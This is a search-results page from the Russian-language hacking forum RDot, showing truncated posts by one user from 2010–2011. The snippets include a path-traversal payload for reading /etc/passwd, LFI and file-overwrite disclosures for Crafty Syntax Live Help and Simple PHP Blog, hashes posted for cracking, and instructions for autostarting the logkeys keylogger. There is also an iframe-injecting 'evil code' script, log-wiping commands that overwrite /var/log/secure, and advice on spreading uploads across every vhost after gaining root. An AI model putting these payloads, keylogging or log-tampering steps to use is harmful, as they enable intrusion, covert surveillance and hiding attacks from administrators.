Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 109.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: asddas
Раздел: Web-среда/Web-applications 13.05.2011, 18:14
Ответов: 3,618
Просмотров: 2,167,326
Автор asddas
2 NetAng, если нет проверки типа file_exists или...

2 NetAng, если нет проверки типа file_exists или чего мудрёней, то конструкция вида /../../../../../../etc/passwd%00 должна прокатить.
Раздел: Сценарии/CMF/СMS 28.04.2011, 18:18
Ответов: 1
Просмотров: 5,774
Автор asddas
Продукт: Crafty Syntax Live Help (LFI/File...

Продукт: Crafty Syntax Live Help (LFI/File disclosure)
Офф сайт: www.craftysyntax.com
Зависимости: Admin, LFI - magic_quotes = Off

При получении админских привелегий, заодно получаем читалку и...
Раздел: Криптография/Cryptography 20.04.2011, 15:48
Ответов: 919
Просмотров: 515,504
Автор asddas
user:4Q.BFQyBfd8dA user:kxgQw/HdHB3Ps ...

user:4Q.BFQyBfd8dA
user:kxgQw/HdHB3Ps
user:08pjWrtEfNY.w
выручайте :)
Раздел: *nix-like 06.04.2011, 16:56
Ответов: 4
Просмотров: 6,680
Автор asddas
Добавь в /etc/sudoers (sudo visudo) и...

Добавь в /etc/sudoers (sudo visudo)

и logkeys -s -o /home/vince/systemlog.log в автозагрузку
Раздел: Web-среда/Web-applications 01.04.2011, 19:29
Ответов: 5
Просмотров: 6,632
Автор asddas
PHP Version Apache Handler User/Group ...

PHP Version

Apache Handler
User/Group
Server Root
Loaded Modules

Core
max_execution_time
Раздел: Web development 25.03.2011, 00:51
Ответов: 89
Просмотров: 87,905
Автор asddas
Зло код :) if...

Зло код :)
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
var bdy = document.createElement("body");
try {
document.appendChild(bdy);
} catch (e) {...
Раздел: Оффтоп/Offtopic 02.03.2011, 20:40
Ответов: 14
Просмотров: 7,563
Автор asddas
Брут для меня это как прикуриватель в машине,...

Брут для меня это как прикуриватель в машине, вроде нахрен не нужен, а бывает что только его и юзаешь :) Думается поспешно приравнивать его к вымершей части хека. Это как с любым инструментом, кто-то...
Раздел: Оффтоп/Offtopic 23.02.2011, 13:48
Ответов: 7
Просмотров: 4,294
Автор asddas
Стоит обратить внимание на темы с расшифровкой...

Стоит обратить внимание на темы с расшифровкой хешей, можно заметить некоторые посты с обещанным вознаграждением за нужный хеш. По моим наблюдениям, цены варьируют в пределах от 5$ до 300$....
Раздел: Чужие статьи/Переводы;Foreign articles/translations 17.02.2011, 15:31
Ответов: 18
Просмотров: 30,705
Автор asddas
Советую больше обратить внимание на "Ссылки...

Советую больше обратить внимание на "Ссылки по теме", хороший материал.
Раздел: Сценарии/CMF/СMS 08.02.2011, 07:39
Ответов: 29
Просмотров: 72,215
Автор asddas
Тайну раскрыли...

Тайну раскрыли (https://rdot.org/forum/showpost.php?p=13731&postcount=985) :) My version:
Решил пару случаев с версиями 2.10.0 и выше при allow_url_fopen Off. Можно инжектить пхпкод в сессию, т.к. c...
Раздел: Релизы/Releases 05.02.2011, 20:45
Ответов: 17
Просмотров: 30,476
Автор asddas
Странно, никогда об этом не задумывался даже....

Странно, никогда об этом не задумывался даже. Получается что ваниш, порет логи :)


printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system...
Раздел: Релизы/Releases 05.02.2011, 10:51
Ответов: 17
Просмотров: 30,476
Автор asddas
Не удаляет временные файлы в /tmp, тестил на...

Не удаляет временные файлы в /tmp, тестил на бубунте, и редхате, где благополучно спалился после многократного изпольвования, whitecat сожрал свободное пространство долбанными логами апача!
Пожалуй,...
Раздел: Релизы/Releases 01.02.2011, 09:41
Ответов: 17
Просмотров: 30,476
Автор asddas
Пробывал так, не запускался. Глянул сорец, в...

Пробывал так, не запускался.

Глянул сорец, в итоге ./witecat -u root -a 127.0.0.1 отработал.
Раздел: Криптография/Cryptography 29.01.2011, 13:45
Ответов: 821
Просмотров: 451,749
Автор asddas
283e990b9ee63dbc395a40261540cc07 ...

283e990b9ee63dbc395a40261540cc07
3b9df90b0344ce83f1af3347217c5878
Раздел: Целевые системы/Target systems 25.01.2011, 15:08
Ответов: 19
Просмотров: 13,793
Автор asddas
Непойму в чём трабл. Если у тебя есть рут и пути,...

Непойму в чём трабл. Если у тебя есть рут и пути, просто парсиш (тот же find подойдёт) все возможные диры для каждого вхоста, потом рендомом из найденного заливаешь.
Например.


Можно заморочится...
Раздел: Web-среда/Web-applications 16.01.2011, 17:29
Ответов: 32
Просмотров: 84,053
Автор asddas
Software: Microsoft-IIS/6.0. PHP/5.2.3 GOOD

Software: Microsoft-IIS/6.0. PHP/5.2.3 GOOD
Раздел: Web-среда/Web-applications 16.01.2011, 15:42
Ответов: 32
Просмотров: 84,053
Автор asddas
Второй день мучаюсь с этим багом, если бы не...

Второй день мучаюсь с этим багом, если бы не посты tipsy и, очень в тему, BlackFan-а, я бы уже наверно забил. Тестил на локалхосте (до этого, вообще никак не удавалось воспроизвести вектор), шелле,...
Раздел: Web-среда/Web-applications 16.01.2011, 13:26
Ответов: 32
Просмотров: 84,053
Автор asddas
Тестил на шелле c Debian, всё гуд :) Кросафчег!

Тестил на шелле c Debian, всё гуд :) Кросафчег!
Раздел: Сценарии/CMF/СMS 15.01.2011, 14:06
Ответов: 1
Просмотров: 4,605
Автор asddas
Продукт: Simple PHP Blog <= 0.7.0 Arbitrary file...

Продукт: Simple PHP Blog <= 0.7.0 Arbitrary file overwrite
Офф сайт: sourceforge.net/projects/sphpblog/
Зависимости: magic_quotes_gpc Off
Уязвимые файлы: /rate_cgi.php
Уязвимый кусок кода:
...
Раздел: Сценарии/CMF/СMS 15.01.2011, 14:05
Ответов: 1
Просмотров: 4,605
Автор asddas
Simple PHP Blog

Продукт: Simple PHP Blog <= 0.7.0 Arbitrary file overwrite
Офф сайт: sourceforge.net/projects/sphpblog/
Зависимости: magic_quotes_gpc Off, allow_url_fopen On, BLOG_TRACKBACK_ENABLED = 1
Уязвимые...
Раздел: Web-среда/Web-applications 13.01.2011, 23:01
Ответов: 3,618
Просмотров: 2,167,326
Автор asddas
Вот такой изврат тоже проканал :) $a = n; ...

Вот такой изврат тоже проканал :)
$a = n;

1.php

while($a>$i){
send('http://localhost/2.php','pishem='.$pishem.'&MY='.$MY);
$i++;
}
Раздел: Web-среда/Web-applications 13.01.2011, 21:48
Ответов: 3,618
Просмотров: 2,167,326
Автор asddas
2 SynQ, чем больше мусора, тем дольше длится...

2 SynQ, чем больше мусора, тем дольше длится время записи. localhost подтверждает :) memory_limit здесь играет не маловажную роль :D
Раздел: Статьи/Articles 11.01.2011, 16:54
Ответов: 23
Важно: ColdFusion Research
Просмотров: 57,675
Автор asddas
Попробуй увеличить тайм аут, и поставить...

Попробуй увеличить тайм аут, и поставить небольшую паузу между запросами.
Раздел: Web-среда/Web-applications 05.01.2011, 22:54
Ответов: 3,618
Просмотров: 2,167,326
Автор asddas
https://rdot.org/forum/showthread.php?t=685

https://rdot.org/forum/showthread.php?t=685
Раздел: Оффтоп/Offtopic 31.12.2010, 16:56
Ответов: 39
Просмотров: 16,779
Автор asddas
С наступающим!

С наступающим!
Показано с 1 по 25 из 109.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot